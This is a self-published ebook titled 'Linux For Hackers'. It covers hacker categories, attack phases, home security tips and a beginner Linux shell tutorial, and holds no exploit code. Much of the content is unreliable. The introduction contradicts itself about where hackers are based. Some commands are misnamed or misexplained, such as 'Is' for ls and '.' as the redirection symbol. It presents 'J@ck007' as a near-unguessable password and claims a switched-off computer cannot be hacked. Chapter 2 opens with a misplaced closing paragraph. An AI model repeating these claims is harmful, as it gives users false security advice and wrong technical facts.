Linux For Hackers

linux system administration guide for basic configuration, network and system diagnostic guide to text manipulation and
everything on linux operating system

[Michael Smith ]
 Text Copyright © [Michael Smith]
All rights reserved. No part of this guide may be reproduced in any form without permission in writing from the publisher except in the case of brief quotations embodied in critical articles or
reviews.
Legal & Disclaimer
The information contained in this book and its contents is not designed to replace or take the place of any form of medical or professional advice; and is not meant to replace the need for
independent medical, financial, legal or other professional advice or services, as may be required. The content and information in this book has been provided for educational and entertainment
purposes only.
The content and information contained in this book has been compiled from sources deemed reliable, and it is accurate to the best of the Author's knowledge, information and belief. However,
the Author cannot guarantee its accuracy and validity and cannot be held liable for any errors and/or omissions. Further, changes are periodically made to this book as and when needed. Where
appropriate and/or necessary, you must consult a professional (including but not limited to your doctor, attorney, financial advisor or such other professional advisor) before using any of the
suggested remedies, techniques, or information in this book.
Upon using the contents and information contained in this book, you agree to hold harmless the Author from and against any damages, costs, and expenses, including any legal fees potentially
resulting from the application of any of the information provided by this book. This disclaimer applies to any loss, damages or injury caused by the use and application, whether directly or
indirectly, of any advice or information presented, whether for breach of contract, tort, negligence, personal injury, criminal intent, or under any other cause of action.
You agree to accept all risks of using the information presented inside this book.
You agree that by continuing to read this book, where appropriate and/or necessary, you shall consult a professional (including but not limited to your doctor, attorney, or financial advisor or
such other advisor as needed) before using any of the suggested remedies, techniques, or information in this book.
 Table of Contents
Introduction
Chapter 1 : Linux Basics
Chapter 2 : A Guide on how networking command line works
Network commands
Commands related to system management
Chapter 3 : What is the use of logging for hackers
Websites and Online Shopping
Social Media
Laptops, Tablets and Mobile Phones
How Big Is My Footprint?

The Big Three Protocols- Required Reading for Any Would-Be Hacker
Chapter 4 : How to scan the server and the network
Vulnerability Scanner
Benefits of Vulnerability Scanners
Types of Vulnerability Scanners
TCP scanning
SYN scanning
UDP scannin g

Window scanning
Network vulnerability scanner
Web application scanner

Password Cracking Tools

Packet Sniffers
Popular Hacking Tools
Cain and Abel
John the Ripper
Wireshark
Nessus
Nmap

Hacking Hardware
Tools in Kali Linux
Exploitation Tools
Forensics Tools

Chapter 5 : Process of hacking and how attackers cover their traces

Hacking Techniques & Tactics
Chapter 6 : Basics of cyber security
Strategies to Combat Cyber Terrorist Threats
Chapter 7 : Protect yourself from cyber attacks and secure your computer and other devices
Conclusion
Introduction
In the most elemental definition, hacking can be described as the act of exploiting the weaknesses and shortfalls in a computer system, as well as the network of such a system. In the exploitation
of these weaknesses, illegal acts might include stealing private information, accessing a network’s configuration and altering it, sabotaging the structural view of the computer’s operating system
and much more.
Hacking is practiced in almost all countries. However, it predominates in developed countries. The advancement of information and technology within the last two decades has shown that most
hackers are based in developing countries such as in South Asia and Southeast Asia.
The term “hacker” is the source of a lot of controversy today and is confusing to many people. Some regard a “hacker” as someone who has the power to make a computer do anything at will. In
another context, a hacker is viewed as a computer security specialist whose primary job is to find the loopholes in a computer system or network and fix them. These loophole finders are
sometimes referred to as crackers. All of these ambiguities in the world of hacking have made it hard to identify that a hacker is, a fact that also makes it extremely difficult to detect the activity
of a hacker who may be playing around with your system.
A plethora of reasons are behind hacking. Some people are into hacking simply to make money. They can steal your password, break into your private information or even alter your correct
information and make it incorrect all for monetary gain. Other hackers are in the game just for a challenge or competition. Furthermore, some hackers are the computer world’s equivalent of
social miscreants, whose purpose is to gain access to a network or system. After gaining access, these hackers will render the network useless so that the users cannot use it properly.
For example, if a community is protesting against something, it can try to hack into a system as a sign of protest against the authorities. It can choose to do this instead of breaking other laws that
it considers to be important .
There are different types of hackers who have various intentions. Based on their modus operandi, we can classify hackers into the following:

1. WHITE HAT HACKERS

These are the good guys because they do not have evil intentions. Perhaps they are named “white-hat” hackers because the color white signifies purity and cleanliness. They hack into a system to
eliminate its vulnerabilities or as a means of carrying out research for companies or schools that focus on computer security. They are also known as ethical hackers. They perform penetration
testing and assess the vulnerabilities of computer systems.

2. BLACK HAT HACKERS

Black hat hackers hack with a malicious intention of breaking every rule in the book. They hack for personal gain, as well as for monetary reasons. They are known to be from illegal
communities that perfectly fit the stereotype of computer criminals. Black hat hackers use a network’s weak spots to render the system useless. These hackers will also destroy your data and
information if they are given the chance to do so. When these hackers get into your system, they will threaten to expose your private information to the public with the goal of getting you to do
whatever they want. Needless to say, black hat hackers will not fix vulnerabilities in your computer system or network, but will use them against you.

3. GREY HAT HACKERS

These hackers will trawl the internet and look for weaknesses in a computer system or network and hack into it. They may do this to show loopholes in the network to the network administrator
and suggest ways of rectifying those loopholes for a given price.

4. BLUE HAT HACKERS

It is said that the color blue represents a member of law enforcement, although this is just a convention. These hackers are freelancers who sell their hacking skills as a service. Computer security
firms hire hacking experts to test their networks so that they can be checked for weaknesses, vulnerabilities and loopholes before they are released to the public. Blue hat hackers are “good guys”
and are different from grey hat hackers, whose intentions may be unpredictable.

5. ELITE HACKERS
These are hackers who are the experts in the community. In most cases, they can break into something impenetrable and also write complex hacking programs. An example of an elite hacker is
Gary McKinnon. As a kid, McKinnon broke into the channels at NASA, installed viruses and deleted files. Elite status is conferred on this type of person primarily by the hacking community or
group to which the person belongs.

6. SKIDDIE
These hackers are not complete newbies. The term “Skiddie” stands for “Script Kiddie.” They hack into a computer system or network by using tools that were created by other expert hackers. In
most cases, they have little knowledge about the program’s background and creation. They are only there to use the programs.

7. NEWBIE
According to the encyclopedia, the word “newbie” means “A new user or a participant who is extremely new and inexperienced to carry out an activity.” Newbie hackers are beginners in the
world of hacking. They have no prior knowledge or experience. They hang around at the periphery of the community with the objective of learning the ropes from their peers.

8. HACKTIVISM
This version of hacking is a process in which a community or an individual uses hacking skills to push information to the public through the hacked system. Hacktivism can be classified into two
kinds:

1. Cyber terrorism: This is called terrorism because the hacker intends to break into a system with the purpose of totally destroying or damaging that
system or network. The hacker will render the computer completely useless.
2. Right to information: These people will hack into a system or a network to gather confidential data from both public and private sources, making
the information accessible to anyone.

9. INTELLIGENCE AGENCIES
Any country can be hacked. To keep a country safe from hacking, intelligence agencies, along with anti-cyber terrorism agencies, engage in their own form of hacking. They do this to protect
their countries from foreign attacks and threats. In the normal sense, we can’t conclude that this is hacking because these agencies are acting as blue hat hackers to employ a defense strategy.

10. ORGANIZED CRIME

In many crime movies, the villain has a godfather for whom he or she works. Organized crime hackers work for bosses. They are related to black hat hackers because they commit crimes and
break laws to aid in the criminal objectives of the godfather or gang to which they belong.
Before a hacker can hack into a system, he or she must complete certain processes. Some of these are:

1. RECONNAISSANCE
To avoid being hacked, you should keep your private information very secure. The word “reconnaissance” in this context is a means by which the hacker tries to gather all information regarding
you (the target) and any weak spots in your system. The hacker uses this step to find as much information as possible about the target.

2. SCANNING AND ENUMERATION

Scanning involves the use of intelligent system port scanning to examine your system’s open ports and vulnerable spots. The attacker can use numerous automated tools to check and test your
system’s vulnerabilities.

3. GAINING ACCESS
If the hacker was able to complete the two phases above, his/her next stage is to gain access to your system. This stage is where all of the hacker’s fun will begin. He or she will use the
weaknesses discovered during the reconnaissance and scanning of your system to break into your connection. The hacker could exploit your local area network, your internet (both online or
offline) or your local access to a PC. In the real sense, the moment a hacker breaks into your system or network, the hacker is considered to be the owner of that system. The security breach refers
to the stage in which the hacker can use evil techniques to damage your system.

4. MAINTAINING ACCESS
In the previous phase, we said that once a black hat hacker hacks your system, it is no longer yours. In this phase, after the hacker has breached your security access and hacked your system
completely, he or she can gain future access to your computer by creating a backdoor. So even if you get access to that computer system or network again, you still can’t be sure you are in total
control. The hacker could install some scripts that would allow access to your system even when you think the threat is gone.
 5. CLEARING TRACKS
The hacker gained access to your system and at the same time maintained access to that system. What do you think the hacker will do next? The hacker will then clear all of his or her tracks to
avoid detection by security personnel or agencies so that he or she can continue using the system. In other cases, the hacker may do this just to prevent legal action against him or her. Today,
many security breaches go undetected. There have been cases in which firewalls were circumvented even when vigilant log checking was in place.
By now, you should have some insight into what hacking is all about. Now we will outline the fundamental security guidelines that will protect you, your system and your information from
external threats. All of the information we will provide is based on practical methodologies that have been used successfully. These methodologies will help prevent a computer system from
being attacked and ravaged by malicious users.
Update Your OS (Operating System)
Operating systems are open to different types of attacks. On a daily basis, new viruses are released; this alone should make you cautious because your operating system might be vulnerable to a
new set of threats. This is why the vendors of these operating systems release new updates on a regular basis, so that they can stay ahead of new threats. This will help you improve your security
and reduce the risk of your system becoming a host to viruses.
Update Your Software
In the previous section, we talked about the importance of an update. Updated software is equipped with more efficiency and convenience, and even has better built-in security features. Thus, it is
imperative that you frequently update your applications, browsers and other programs.
Antiviru s
Based on our research, we have seen that some operating systems are open to a lot of attacks, especially Microsoft or Windows platforms. One way you can protect your system from viruses is
through an antivirus program. An antivirus program can save you in many ways. There are many antivirus programs (free or paid) that you can install on your system to protect against threats. A
malicious hacker can plant a virus on your system through the internet, but with a good antivirus scan, you can see the threat and eliminate it. As with any other software or program, your
antivirus software needs frequent updates to be 100 percent effective.
Anti-Spyware
This program is also important, as you don’t want Trojan programs on your system. You can get many anti-spyware programs on the internet; just make sure you go for one that has received
good ratings.
Go for Macintosh
The Windows operating system is very popular and therefore many hackers and crackers target it. You may have read articles and blogs saying that Macintosh operating systems are less secure;
however, Macintosh is immune to many threats that affect Windows. Thus, we urge you to try the Macintosh platform. However, as we have explained in other chapters, no system in the world is
completely hack-proof, so don’t let your guard down.
Avoid Shady Sites
When you are browsing Facebook, you may come across unknown people who send you messages with links, some in the form of click bait. Avoid clicking on such links. Also, you must avoid
porn sites, or sites that promise you things that are too good to be true. Some of these sites promise you free music when you click on a link, while others offer free money or a movie. These sites
are run by malicious hackers who are looking for ways to harm your computer with their malware links. Take note that on some malicious sites, you don’t even have to click on anything to be
hacked. A good browser will always inform you of a bad site before it takes you there. Always listen to your browser’s warnings and head back to safety if necessary.
Firewall
If you are a computer specialist working in an organization, you might come across cases in which more than one computer system’s OS is under one network. In situations like these, you must
install software that provides a security firewall. The Windows operating system has an inbuilt firewall that you can activate and use directly. This firewall feature comes in different versions of
Windows, including Windows XP, Windows Professional, Windows 10 and the other versions.
Spam
You can be hacked from spamming too. Email providers have taken the initiative to classify emails according to a set of parameters. Some emails will be sent directly into the inbox and some
will be sent to the spam folder. To be safe, avoid opening emails that look suspicious. Some of them will have attachments that you should not open. Regardless of the security measures taken by
email providers, some spam emails will still pass their filters and come straight into your inbox. Avoid opening such emails and do not download the attachments that come with them.
Back-Up Options
Whether you are running your own business or working for an organization as an ethical hacker, it is crucial that you back up your work. Some files will contain confidential information, such as
personal files, financial data and work-related documents you cannot afford to lose. You should register with Google Drive, One drive and other cloud drive companies so that you can upload
your files as a form of backup. You can also purchase an external hard disk and transfer all of your important files to it. Take all these security measures because single malicious software can
scramble your data regardless of the antivirus you have installed. You can’t reverse some actions once they’ve been taken, so always have a backup.
Password
This is the most important aspect of security. The importance of a strong password can never be overstated. Starting from your e-mail, your documents or even a secure server, a good password is
the first and last line of defense against external threats. There are two categories of passwords: weak and strong. A weak password is made by using your mobile phone number, your name, a
family member’s name or something that can be guessed easily. Avoid using this kind of password, as even an amateur hacker can guess it .
Some people use dates such as their birthday or a special anniversary; however, that is still not safe. When creating a password, take your time and do some basic math because your password
must contain both letters and numbers. You can even combine it with special characters. For instance, if your initial password is “jack,” you can make it “J@ck007.” A password like this will be
almost impossible to guess even though it’s simple. Furthermore, avoid writing down your passwords. Your password isn’t a file that needs backup; it must be personal to you. Make sure you use
a simple password that is very strong. However, keep in mind that a strong password still doesn’t make you completely safe.
At this point, you should have an in-depth idea of what hacking is all about and some guidelines for ensuring the safety of your computer system or network. Following are general tips to follow
to avoid becoming a victim of hackers.

When you log into your email, you should avoid opening emails from unknown sources. Most importantly, do not download any attachments that come with such
emails.
Do not visit unsafe websites. Always visit websites that are secured, such as sites with “https” . Try to only engage in safe browsing.
Before you install a new program, make sure the program is scanned to ensure it is free of viruses. Then, you want to delete any old installation files because you now
have the new installation files. This can save you if a hacker uses those old files as a backdoor.
Scan your files from time to time. Also make sure that all of the applications on your system are updated frequently to the latest version.
If you work at home, make sure you are in contact with security professionals or firms that can help you check network loopholes and rectify them as soon as possible.
Always back up your files. You can use safe cloud drives such as Google Drive or Drop box. You can also purchase an external drive to keep your important files safe
and intact.
Are you on a social network? Avoid clicking on links sent by people you don’t know. Such tempting messages can be invitations to private chat rooms or promises of
money if you click on the links. Avoid them and stay safe.
As technology is improving, so are software developers. Always make sure you are surfing the internet with a good browser. For instance, some browsers have inbuilt
virus or danger detection bots, which will alert you if you are trying to access a web page that is not safe. When you want to download a browser, go for one with better
inbuilt security features. The following browsers are recommended:
Google Chrome
Mozilla Firefox
Safari

Use the features that matter to you when you are connected to the internet with your browser. For instance, if you are not using Java or Active X while you are
connected, deactivate them in your browser. Having them connected all the time is not safe.
Research has shown that the most secure operating systems are Linux and Macintosh. If the two systems meet your needs, it is recommended that you switch to them.
They are more secure, as they have had fewer incidences of hacking compared to the popular Windows systems.
When you sleep, you can still be attacked if your computer system is on and idle or in sleep mode. To prevent this, make sure your computer is completely switched off
when you are not using it. It is not possible to hack into a system that is switched off.
Chapter 1 : Linux Basics

When you think of operating systems, the two that most often come to mind are Windows and Mac OS. These happen to be 2 of the most significant widespread and they have been around for
some time with many different versions. They are popular primarily because of the computer systems they come with, and people usually use them simply because they come pre-installed.
Whereas these two are the most popular, there is another operating system that is starting to gain some traction in the computer world; the Linux operating system.
For the most part, Linux is found on mobile devices, smartphones, and tablets, but because it is open sourced and free, there are now more people with computers and laptops that are beginning
to use Linux as their personal operating system. Since it is able to work with embedded systems, Linux is useful on mobile devices, computers, smart watches, routers, gaming consoles, controls,
and even televisions.
Linux is made with a straightforward design that a lot of programmers like. It is straightforward and has a lot of the power that other operating systems possess, but it is even easier to use. A lot
of programmers because it is open source, meaning they are able to use it or make changes if they would like, and has all the features that they could possibly want for computers, mobile devices,
and more.
Most people are familiar with working on Windows or on the Mac OS, and they feel that Linux might not be as safe as some of the other options - but this is just simply not the case. In reality,
Linux is one of the best operating systems out there. It is just newer than and not as well-known as some of the other operating systems, but since it is so easy to use and can also be used on
mobile devices, it is quickly growing in popularity.
How Linux came into existence :
Linux was first released during 1991. Initially, it was developed with the idea that it should be a free operating system for Intel x9 based personal computers. However, it was soon changed to
become a more collaborative project, meaning that the source code was free to use. Under the license terms for the operating system, it is able to be modified and used for both non-commercial
and commercial distribution. Since it is compliant with POSIX or the Portable Operating System Interface’, it is a very reliable operating system. The best fact about Linux is that it is open
sourced and free to use, which may be why a lot of people are switching over to this operating system. Mac OSX and Windows all cost something for the user to get and they will either have to
purchase the software on their own or have it put on a computer for them. This can get costly when you factor in the number of updates required for these operating systems. Since Linux is free,
you are able to update at any time without additional costs.
The open sourcing is helpful for both the programmers as well as everyday users with Linux. Programmers are able to use the various codes that are in the library in order to create some of their
own new code and release it for others to use. Those who are on Linux get the benefits of better updates, newer features, and more, all thanks to the ability of many programmers being able to
work on the system at the same time. All of this makes Linux an easy choice, especially going forward as it is compatible with both smartphones and tablets also.
Linux Components:
There are seven main components of Linux that you will encounter. They are as follows:
Availability of applications
Linux has thousands of applications that are available for the user to install right away. In fact, as soon as you install the Linux system, you will be able to install as many of the applications as
you choose. Think of the applications in Linux as similar to what you will find with the App Store and the Windows Store, where you are able to pick out the applications that you want to work
with. Once you have done some searching and found the apps that you want, you can directly download and install them to the Linux system.
Daemon s
The Daemons are basically the components in Linux that are going to serve as the background services. This would be things like scheduling, printing, and sound. These are going to be launched
at one of two times; either during the boot or after you perform the desktop login.
Desktop environments
The environments for the desktop refer to the different components that work with user interaction. Some of the examples of these desktop environments include Enlightenment, Cinnamon,
Unity, and GNOME. Each of these is going to come with their own set of web browsers, calculators, file managers, configuration tools, and some other features that have been built into the
environment.
Graphical server
This is basically going to be the subsystem inside of Linux. The main function that you are going to see within this is that the graphical server it will show the different graphics that are on your
screen. Sometimes you will hear it being called the ‘X server’ or simply as ‘X.’
The boot loader
As you keep using Linux, it comes a moment when you want to make sure that the system is going to boot up. The boot loader is going to take over the boot process inside of the Linux
management. It is often going to be seen in the form of a splash screen. Once you see this splash screen show up, it is going to proceed over to the booting process slowly.
The kernel
The next main component that you will see within the Linux system is known as the kernel. This is essentially the core inside of Linux. It is going to be in charge of managing the CPU,
peripheral devices, and the memory inside of the Linux operating system.
The Shell
We are going to talk about the shell in more detail later on because it is vital when working with Linux, so for now, we will keep things simple. The shell is basically going to be the command
line inside of Linux. It is going to permit various controls based on the commands that the user types into the interface. This is where you are going to type in the codes and the commands that
you want to give the computer.
Downloading Linux
Downloading this system is pretty easy to do. You merely need to visit www.ubuntu.com/downloads/desktop in order to get this to download onto your computer system. Once it has had time to
get set up, you should also take some time to add on some of the applications that you would like. Of course, you can always add additional apps later on if you would like, but it is easiest to get
started with some of the main apps right away. You can also choose to get Linux downloaded onto a USB drive so that you can place the operating system on your computer whenever you need
it. Some people like to have it running on the system at all times, and others would rather just to have it on there at certain times when they are writing programs or trying to do a bit of hacking
work. Both of these methods work fine; it only depends on what you want to do with Linux. If you just want to use Linux on the side as an additional part of your system, it is best to download it
to the USB so that you can have Linux on the computer only when you need it. It can take up a lot of computer space when you have two operating systems there all the time and it can
potentially cause the other processes to slow down. On the other hand, if you would like to replace your other operating system with the Linux operating system, you can, of course, download it
to your computer. Make sure to get rid of the other operating system though to ensure that you are getting the speed that you need on your computer.
Learning some basic commands in Linux
There are a lot of commands that you will need to learn in order to get Linux to work well for your needs. Here, we will cover some of the main ones that you may find useful, and later we will
get into some of the different things that you are able to do with your coding. Some of the basic commands that you should know how to perform with Linux include:
Mkdir - this one is good for creating directories
Rm - this one is going to allow you to remove a file without having the confirmation prompt come up
W - This one is going to display information about the current user on the computer, whether that is just you or you have more than one user on your system, as well as the average load for the
user on the system.
Uptime - this one is going to display information about the system. You will be able to use it in order to see the load average on the system, the number of users on the system, and even how long
the system has been running.
Is - this one is going to display a list of files in a format that you are able to read. It is also going to display any new files that were created since their last modification.
Who – this is going to display the date, time, and host information.
Less – this one is going to allow you to view your files quickly. It can also be used for the page down and the page up options.
More – this one is going to make it easier to do a quick view of the files, and it can also display percentages as well.
Top – this one is going to display kernel managed tasks and the processor activity in real time. It can also go through and display how the processor and memory are being used.
Last – this one is going to display some more information about the activity of the user on the system. Some of the information that you will notice includes kernel version, terminal, system boot,
date, and time.
As you can see, Linux is a programming system that is going to make it easier than ever to get tasks done, whether you are working online, on the phone, on a tablet, or through another method.
It is free to install, but it is still stable and will often work just as well if not cooler than some of the other operating systems that are available.
Chapter 2 : A Guide on how networking command line works

This is the end of the chapter dedicated to the main Linux commands. We started with the general commands and then introduced those related to networks as well as to the main functions of an
operating system.
Now you are ready for the exercises I will present to you in the following chapters. But first, let me explain how networks work and what are the services most ethical hackers usually use.
The more essential but basic Linux commands that you need to know so fire up Linux and play along. There will be exercises to test your knowledge along the way, although I won’t be
providing answers to all of them because you should be able to work it out from the section you just read:
Listing Directories and Files
ls
When your login, you will always be in your home directory. This will have the same name as you have for your username and it is where all your personal files and subdirectories will be saved.
To find out the contents of your home directory, type in:
% ls
f there aren’t any, you will be returned to the prompt. Be aware that, using the ls command, you will only see the contents whose name does not start with a dot. The files that start with the dot
are hidden files and will normally have some important configuration information in them. The reason they are hidden is because you should not be touching them.
To see all the files, including those with the dot, in your home directory, type in
% ls -a
You will now see all files including those that are hidden.
ls is one of those commands that is able to take options, and the above one, -a, is just one of those options. These will change how the command works,
Making a Directory
mkdir
To make a subdirectory of the home directory, to hold the files you create, (for the purposes of this, we will call it linuxstuff, type in this in your current directory:
% mkdir linuxstuff
To see that directory, type in
% ls
Changing to Another Directory
cd
cd means change directory from the current one to directory so, to change to the directory you just created, you would type in:
% cd linuxstuff
To see the content, of which there shouldn’t be any right now, type ls
Exercise
Go into the linuxstuff directory and then make another one called backups
. and .. Directories
Staying in the linuxstuff directory, type this in
% ls -a
You will see, and this is in all directories, two directories that are called . and ..
In Linux, a single dot (.) signifies the current directory so if you were to type in (making sure to leave a space between cd and the single dot)
% cd .
you would stay exactly where you are in the linuxstuff directory
While this might not seem to have much use at first look, you will soon find that by typing a dot as the current directory name will save you quite a bit of typing
.. signifies the parent directory, which is the parent of the directory you are already in so if you were to type
% cd ..
you would go back one directory, in this case, to your home directory.
Note – if you get lost in your file system, simply type cd at the prompt and you will be returned straight to your home directory
Pathnames
pwd
pwd stands for print working directory and using a pathname lets you work out exactly where you are in the file system. he absolute pathname that goes with your home directory, you would type
in cd, so you go bac to the home directory, and then type in
% pwd
You should see something like this as the pathname
/home/its/ug1/ee51vn
And this means that the home directory is in a subdirectory called ug1, which is a group directory and this is located in the subdirectory called its, which is located in the home subdirectory, in
the top level of the root directory named /
Exercise
Explore your file system with the commands, cd, pwd and ls. Don’t forget, typing cd will take you back to the home directory
Understanding Pathnames
Go back to your home directory if you aren’t already there and type in
% ls linuxstuff
This will list the contents of the home directory. Now type in
% ls backups
No such file or directory
Why? You created a directory with that name earlier but you didn’t create it in the working directory. So, to get to backups directory, you either must use cd and specify the directory or you must
use the pathname
% ls linuxstuff/backups
~ (your home directory name)
We can also use the tilde character (~ ) to refer to the home directory and to specify a path that starts at the home directory. So, if you typed in
% ls ~/linuxstuff
You would see a list of what is in the linuxstuff directory, irrelevant of where you currently are in the file system.
Exercise
Look at the following commands and work out what would be listed if you typed them:
% ls ~
% ls ~/..
Section Summary
CommandMeaning
lslists the files and the directories
ls -alists all directories and files including those hidden
mkdirmakes a new directory
cd directorychange to the directory named
cdchange back to the home directory
cd ~change back to the home directory
cd ..change to the parent directory
pwdshows the pathname for the current directory
Copying Files
cp
If you wanted to copy file1 in the working directory and name it file2, you would type in
cp file1 file2
First, go to this website and copy the text into a file. Name it science.txt and save it to your linuxstuff directory
So, now we are going to copy a file that is to be found in an open access part of the file system to the linuxstuff directory. First, you would get back to your linuxstuff directory by typing
% cd ~/linuxstuff
Then you would type the following at the prompt
% cp /vol/examples/tutorial/science.txt .
Note – do not forget to add the dot at the end
The command is saying that we are going to copy the file called sceience.txt to linuxstuff but we will keep the name the same
For the purposes of the next example, you must create a file named science.txt in your linuxstuff directory
Moving Files
mv
mv file1 file2 will move or rename file1 to file2
When you use the mv command, you will move the file and not copy it, ensuring that you still have just one file and not two. We can also use it to give a file a new name and we do this by
moving it to the same directory it is already in but with a different name.
Go back to your linuxstuff directory and type in the following
% mv science.bak backups/.
Now type in ls and the ls backups and see what has happened
Removing a File or Directory
rm
rmdir
To delete a file, or remove it, we use the rm command. Let’s make a copy of science.txt and then we will delete it
From your linuxstuff directory, type in
% cp science.txt tempfile.txt
%ls
% rm tempfile.txt
% ls
If you want to remove an entire directory, first make sure there are no files in it and then use the rmdir command. Have a go at removing the directory called Backups – Linux won’t allow it
because it has something in it
Exercise
Use mkdir to create a new directory named tempstuff and then use the rmdir command to remove it
Displaying File Contents on the Screen
clear
Before we move on, lets clear our terminal window of all the commands already typed in so that we can better understand what the output of the next commands are. To do this, type
% clear
All the text will be removed and you will be left with the prompt. So, let’s move on to the next command
cat
cat is used to concatenate and display a file’s content on your screen. Type in
% cat science.txt
You will see that the file is bigger than the window size so it will scroll, making the contents hard to read
less
This command will write the file contents to the screen one page at a time so type in
% less science.txt
Press on your space bar if you need to see the next page and, if you have read enough, type in q.
Note – if you have long files, use the command less rather than the command cat.
head
This command will write the first ten lines of the specified file to your screen. Clear your screen and the type in:
% head science.txt
Now type
% head -5 science.txt
Look at what you go and decide what adding -5 did to the command
tail
As opposed to the head command, the tail command will write the last ten lines of the specified file to the screen. Clear your screen and type in:
% tail science.txt
Looking Through a File’s Contents
Using the less command, you can search for a keyword pattern in a text file. For example, if you wanted to find all the instances of science in the science.txt file, you would type in
% less science.txt
And then, staying in less, you type a forward slash and the work you want to search:
/science
All the instances of the word are highlighted; to find the next instance, type in
grep
grep is one the standard utilities on Linux and it is used to search for specific patterns or words. Clear your screen and type in
% grep science science.txt
Now you can see that the command grep prints each of the lines that have the word science in it
Or has it?
Now type in
% grep Science science.txt
grep is case sensitive and will distinguish between science and Science. If you want to ignore this case sensitivity, use -i. For example, type in
% grep -i science science.txt
If you want to search for a specific pattern or phrase, it must be inside single quote marks. To search for spinning top, you would type in
% grep -i 'spinning top' science.txt
Other options with the grep command are:
-v will display the lines that don’t match the specified text
-n will precede each of the matching lines with the correct line number
-c will only print out the total number of the matched lines
Have a go at these and see what the results are. You can use more than one of these in one command so, to show the number of lines that do not include Science or science, you would type in
% grep -ivc science science.txt
wc
This is a neat utility and is short for word count. If you wanted to do a total word count on the science.txt file, you would type
% wc -w science.txt
If you want to know how many lines are in the file, type:
% wc -l science.txt
Section Summary
CommandMeaning
cp file1 file2copies file 1 and names it file2
mv file1 file2moves or renames file1 to file2
rm fileremoves a file
rmdirremoves a directory
cat filedisplays a file
less fileshows one page of a file at a time
head filedisplays just the first 10 lines of a file (or however many specified)
tail filedisplays the last 10 lines) or however many specified) of a file
grep “keyword” filesearch for a specific keyword in a file
wc “keyword” filecounts how many characters or words are in a file
Redirection
Most of the processes that are initiated by Linux commands will write to the terminal screen, which is the standard output. Many of them also take their input from the keyboard. As well as that,
there are also those that write error messages to the terminal screen. Already, we have used the cat command to write a file’s contents to the terminal so now type the following, without
specifying any file
% cat
Type a few words in using the keyboard, anything will do, and then press return
Hold down CTRL and press the d key – this will finish the input
When you run the cat command without a file, it will read the keyboard input and, when it receives the end of the file, the d, it will copy it to your terminal
In Linux, we are able to redirect input and output.
Redirecting Output
The . symbol is used to redirect command output. For example, if we wanted to create a file with a name of list1, that had a list of fruits in it, we would type:
% cat > list1
Then you type the names of a few fruits and, after each one, press return. For example
apple
pear
banana
then press ctrl+d
The cat command will read what was input from the keyboard and > will redirect it to the output, the screen, in a file named as list1. If you wanted to read what the file had in it, you would type
% cat list1
Exercise
Now, using the same method, create a file named list2, with these fruits in it – plum, orange, grapefruit, mango. Now read the file contents
Appending to Files
>> will append the standard output to a file so, if we wanted to add some more items to list1, we would type
% cat >> list1
And then the names of more fruits
grape
peach
orange
Then press CTRL+d to stop
To read the file contents, type
% cat list1
You should, by now, have two files, one containing six fruits and one containing four fruits. Now we will join the two lists using the cat command into one file named biglist. Type in
% cat list1 list2 > biglist
This will read the contents of both lists, in turn, and then output the text from each into a new file called biglist
To read the contents of biglist, type in
% cat biglist
Redirecting Input
To redirect command input we use the < symbol. This will sort a list in numerical or alphabetical order. Type in
% sort

Now type some animal names in and press return after each of them:
ape
cat
dog
bird
then press CTRL+d to stop
The output would be
ape
bird
cat
dog
When you use < you can redirect input from a file instead of from the keyboard. For example, if you wanted a list of fruits sorted, you would type
% sort < biglist
The list will be sorted and output on the screen
If you wanted the sorted list to be output to a file, you would type
% sort < biglist > slist
The cat command is used for reading the contents of slist
Pipes
If you want to know who is on the same system as you, you would type in
% who
One way to get a list of names that has been sorted would be to type
% who > names.txt
% sort < names.txt
This is a rather slow method and you would need to remember that the temporary names file has to be removed when you are done. Really, what you are looking to do is connect
the output from the who command straight to the input of the command called sort. This is what pipes are for and the symbol for the pipe is a vertical bar (|). For example, if you typed in
% who | sort
You would get the same result but it would be much quicker
If you wanted to find out how many other users have logged in, type in
% who | wc -l
Exercise
Use pipes to show all of the lines in list1 and list2 that have the letter p in them and then sort the results
Answer
As this is a little more complex, I have opted to show you the answer this time:
% cat list1 list2 | grep p | sort
Section Summary
CommandMeaning
command > filewill redirect the standard output to a specified file
command >> filewill append the standard output to a specified file
command < filewill redirect the standard input from a specified file
command1 | command2will pipe command1 output to command2 input
cat file1 file 2 > file0will concatenate or join files 1 and 2 to file0
sortwill sort the data
whowill show you who is logged on to the system with you
Wildcards
* is a wildcard character and it will match with none or more characters in a directory or file name. For example, go to your linuxstuff directory and type in
% ls list*
This shows you all of the files that are in the current directory, beginning with list…
Now type in
% ls *list
This shows all the files that end with …list in the current directory
? is another wildcard character and it is used to match one character only. So, for example, if you were to type ?ouse, it would match with files like mouse or house, but it wouldn’t match with
grouse. Type in
% ls ?list
And see what happens
Filename Conventions
It is worth noting that directories are special file types so the naming conventions for files will also apply to a directory. When you name a file, you cannot use special characters, such as *, /, %
and &. You also cannot use spaces so, when you name a file use numbers and letters, along with the underscore and the dot.
Good namesBad names
project.txtproject
my_big_program.cmy big program c
bob_billy.docbob and billy.doc
File names begin with lowercase letters and end with a dot and a file extension that indicates the file contents. For example, if you have files that have C code n them, they may have the .c
ending, such as prog1.c.
To list all the files that have C code I the home directory, all you need to type at the command prompt is ls*c. from within the home directory
Help
There are plenty of online manuals providing information about commands. The pages will tell you what a command can do, the options that it can take and how each of those options will
modify the command. If you wanted to read the page for a specific command, you would type in man. For example, if you wanted to know more about the wc command, you would type in
% man wc
Or you could type
% whatis wc
This one would provide a short description of the command but wouldn’t give you any other information about options, or anything else.
Apropos
When you do not know the name of the command exactly, you would type in
% apropos keyword
This will provide you all the commands with the word keyword in the page header in the help manual. Try typing:
% apropos copy
Section Summary
CommandMeaning
*matches any amount of characters
?matches just one character
man commandwill read the page in the online manual for a specific command
whatis commandgives a short description of a specified command
apropos keywordwill match a command with a keyword in the man page
Command to execute: l s
Explanation: this command allows you to list the contents of files and/or folders.

Command to execute: pwd

Explanation: the current directory is printed.

Command to execute: cd
Explanation: it allows you to access the selected folder.

Command to execute: cp
Explanation: it allows you to copy files.

Command to execute: mkdir

Explanation: it allows you to create a folder.

Command to execute: rmdir

Explanation: it allows you to remove a folder.

Command to execute: touc h

Explanation: it allows you to create a file.

Command to execute: tar

Explanation: it creates an archive for a certain file.

Command to execute: clear

Explanation: it allows you to return to an initial shell.

Command to execute: adduser

Explanation: it allows you to add a new user.

Command to execute: chmod

Explanation: it manages file and/or folder permissions.

Command to execute: vi
Explanation: it allows you to edit a file .

Command to execute: cat

Explanation: it allows manipulation of a file.

Command to execute: grep

Explanation: it searches a file for particular patterns.

Command to execute: apt-get

Explanation: package management. For example, apt-get install.

